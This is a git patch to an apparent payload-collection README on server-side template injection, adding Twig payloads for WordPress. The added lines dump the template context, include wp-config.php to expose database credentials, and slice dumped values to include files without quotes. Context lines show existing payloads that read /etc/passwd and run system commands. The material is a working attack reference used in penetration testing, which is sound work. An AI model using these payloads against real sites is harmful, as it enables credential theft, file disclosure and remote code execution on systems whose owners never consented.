From 33d632df4eb18570de8fbb23c43cd826d2d70df7 Mon Sep 17 00:00:00 2001
From: "s. vewa" <svewa@users.noreply.github.com>
Date: Sun, 24 Jul 2022 12:30:09 +0200
Subject: [PATCH] Twig in Wordpress

Was very unsuccessful with the given Twig examples, quotes were escaped so got invalid, file_excerpt threw an error, too. Include and also injecting the file name helped. Don't know if this is a wordpress thing...
---
 Server Side Template Injection/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 21f76c1..c9eb88e 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine.
 {{7*7}}
 {{7*'7'}} would result in 49
 {{dump(app)}}
+{{dump(_context)}}
 {{app.request.server.all|join(',')}}
 ```
 
@@ -796,6 +797,7 @@ $output = $twig > render (
 
 ```python
 "{{'/etc/passwd'|file_excerpt(1,30)}}"@
+{{include("wp-config.php")}}
 ```
 
 ### Twig - Code execution
@@ -809,6 +811,12 @@ $output = $twig > render (
 {{['cat$IFS/etc/passwd']|filter('system')}}
 ```
 
+Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
+
+```python
+FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }}
+```
+
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.
 
 ```powershell